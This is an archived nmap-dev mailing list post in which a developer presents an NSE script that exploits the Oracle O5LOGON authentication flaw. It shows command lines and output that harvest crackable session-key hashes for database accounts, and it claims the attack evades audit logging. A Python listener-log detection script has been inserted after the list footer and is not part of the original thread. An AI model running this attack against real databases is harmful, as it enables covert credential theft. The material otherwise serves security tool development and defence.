Nmap Development mailing list archives
Re: Script suggestion - oracle
From: Dhiru Kholia <dhiru.kholia () gmail com>
Date: Sat, 6 Oct 2012 16:06:48 +0530
On Sat, Oct 6, 2012 at 1:11 PM, Dhiru Kholia <dhiru.kholia () gmail com> wrote:
> On Sat, Sep 29, 2012 at 10:40 PM, David Fifield <david () bamsoftware com> wrote:
>> On Fri, Sep 28, 2012 at 10:59:14AM +0200, Martin Holst Swende wrote:
>>> I took a look at this http://marcel.vandewaters.nl/oracle/security/cryptographic-flaws-in-oracle-database-authentication-protocol
>>>
>>> Then checked tns.lua. Patrik has implemented TNS far enough, it seems; there is implementation support for enumerating users and getting the salt (auth["AUTH_VFR_DATA"]) and session key. As I interpret the info given above and in the comments on http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012?utm_source=Threatpost&utm_medium=Tabs&utm_campaign=Today%27s+Most+Popular, it seems like the session key is encrypted with SHA1(salt+pw), and it is possible to determine whether the decryption is correct or not, and thereby determine what the password is. More info about this will probably be released soon; it would be a solid script to add to NSE. Since enumeration is already implemented, a script could just get all users and their passwords in one go. That's pretty awesome.
>>
>> I made a script ideas entry for it.
>>
>> https://secwiki.org/w/Nmap/Script_Ideas#oracle-dump-hashes
>>
>> oracle-dump-hashes might not be the best name. I was thinking the script could just dump the keys or hashes or whatever, and an offline tool (or postrule script) could crack them.
>
> I have written an NSE script for doing a stealth attack against the O5LOGON protocol. This allows us to brute-force the session key(s) offline.
>
> I have verified that using this script generates no alerts or logs on the Oracle server. The result of the query "select os_username, username, userhost, action_name, returncode from dba_audit_session where action_name = 'LOGON' and username = 'SYS' and returncode > 0 order by timestamp;" is constant when this script is used.
>
> ✗ cat ~/passdb
> wrongpassword
> ✗ ./nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL,userdb=/home/user/userdb,passdb=/home/user/passdb 192.168.2.253 --datadir .
>
> Starting Nmap 6.02 ( http://nmap.org ) at 2012-10-06 13:03 IST
> sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3
> sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3
> Nmap scan report for 192.168.2.253
> Host is up (0.00033s latency).
> PORT     STATE SERVICE
> 1521/tcp open  oracle
> | oracle-brute-stealth:
> |   Accounts
> |     No valid accounts found
> |   Statistics
> |_    Performed 2 guesses in 1 seconds, average tps: 2
>
> Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds
With the latest patch (attached) the output is improved:

✗ ./nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL,userdb=/home/user/userdb,passdb=/home/user/passdb 192.168.2.253

Starting Nmap 6.02 ( http://nmap.org ) at 2012-10-06 16:03 IST
Nmap scan report for 192.168.2.253
Host is up (0.00027s latency).
PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-brute-stealth:
|   Accounts
|     sys:$o5logon$022BE241D8412D17171EB9740F3E2EF8087D39AEAEA547721A3860148EE28420B37F329CE80E9B62A4E9586A2BF1715F*5B624C20405D6C0FCCC3 - Hashed valid or invalid credentials
|     test:$o5logon$3DD61959DB37F02CE0F60F64FE0DCBEB27FD2F357E7F4E5789F37999399FD0562D4126F360FF58DF349142B2F2ABA36E*72C21891D052649660F2 - Hashed valid or invalid credentials
|   Statistics
|_    Performed 4 guesses in 1 seconds, average tps: 4

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

--
Cheers,
Dhiru
Attachment:
0001-Oracle-O5LOGON-stealth-attack-v2.patch.gz
Description:
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
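A detection check a DBA could pair with the dba_audit_session query quoted in the thread, added here as an example that is not part of Dhiru's script or the patch: the audit trail only records completed LOGON actions, but each guess in the output above is a separate TNS connection, which the listener logs on its own (this assumes listener logging is enabled and the 11g listener.log line layout; the sample lines, client addresses and the burst threshold are constructed for the example).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of listener.log "establish" records (assumed 11g layout):
# four connects within two seconds from one client to SID ORCL, as a run of
# oracle-brute-stealth with four guesses would leave, plus one sqlplus connect.
SAMPLE_LISTENER_LOG = """\
06-OCT-2012 16:03:11 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.2.50)(PORT=41022)) * establish * ORCL * 0
06-OCT-2012 16:03:11 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.2.50)(PORT=41023)) * establish * ORCL * 0
06-OCT-2012 16:03:12 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.2.50)(PORT=41024)) * establish * ORCL * 0
06-OCT-2012 16:03:12 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.2.50)(PORT=41025)) * establish * ORCL * 0
06-OCT-2012 16:05:40 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.7)(PORT=50100)) * establish * ORCL * 0
"""

# One "establish" record: timestamp, target SID/service name, and the client
# address the listener itself saw (not the self-reported HOST inside CID).
ESTABLISH_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* "
    r"\(CONNECT_DATA=\((?:SID|SERVICE_NAME)=(?P<sid>[^)]+)\).*?\* "
    r"\(ADDRESS=.*?\(HOST=(?P<host>[^)]+)\).*?\) \* establish \* "
)


def parse_establishes(log_text):
    """Map (client_ip, sid) -> sorted list of connect timestamps."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = ESTABLISH_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
            events[(m["host"], m["sid"])].append(ts)
    return {key: sorted(stamps) for key, stamps in events.items()}


def flag_connect_bursts(log_text, threshold=3, window=timedelta(seconds=10)):
    """Return {(client_ip, sid): total_connects} for each client that opened at
    least `threshold` connections to one SID inside any `window`; a sliding
    window over the sorted timestamps keeps this linear per client."""
    flagged = {}
    for key, stamps in parse_establishes(log_text).items():
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[key] = len(stamps)
                break
    return flagged
```

Tune `threshold` and `window` to the connection rate of the application hosts in question; a legitimate pooled client can also open several connections in a burst.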
Current thread:
- Re: Script suggestion - oracle Martin Holst Swende (Oct 04)
- Re: Script suggestion - oracle David Fifield (Oct 04)
- Re: Script suggestion - oracle Dhiru Kholia (Oct 04)
- Re: Script suggestion - oracle Richard Miles (Oct 04)
- Re: Script suggestion - oracle Dhiru Kholia (Oct 04)
- <Possible follow-ups>
- Re: Script suggestion - oracle Dhiru Kholia (Oct 06)
- Re: Script suggestion - oracle Dhiru Kholia (Oct 06)
- Re: Script suggestion - oracle Patrik Karlsson (Oct 06)
- Re: Script suggestion - oracle Richard Miles (Oct 10)
- Re: Script suggestion - oracle Abuse 007 (Oct 10)
- Re: Script suggestion - oracle Dhiru Kholia (Oct 06)
- Re: Script suggestion - oracle Richard Miles (Oct 10)
- Re: Script suggestion - oracle David Fifield (Oct 04)
- Re: Script suggestion - oracle Richard Miles (Oct 10)